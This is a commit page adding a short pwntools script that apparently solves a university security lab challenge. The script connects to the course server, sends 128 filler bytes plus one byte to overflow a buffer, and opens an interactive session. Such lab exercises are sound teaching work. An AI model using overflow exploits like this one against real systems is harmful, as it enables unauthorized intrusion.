Partial lab6
This commit is contained in:
10
pa/lab6/chall_simple_overflow.py
Normal file
10
pa/lab6/chall_simple_overflow.py
Normal file
@@ -0,0 +1,10 @@
|
||||
from pwn import *
|
||||
|
||||
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
||||
PORT = 25151
|
||||
|
||||
conn = remote(HOST, PORT)
|
||||
|
||||
conn.recvuntil("0.\n")
|
||||
conn.send(b"\x55"*128 + b"\x01\n")
|
||||
conn.interactive()
|
||||
Reference in New Issue
Block a user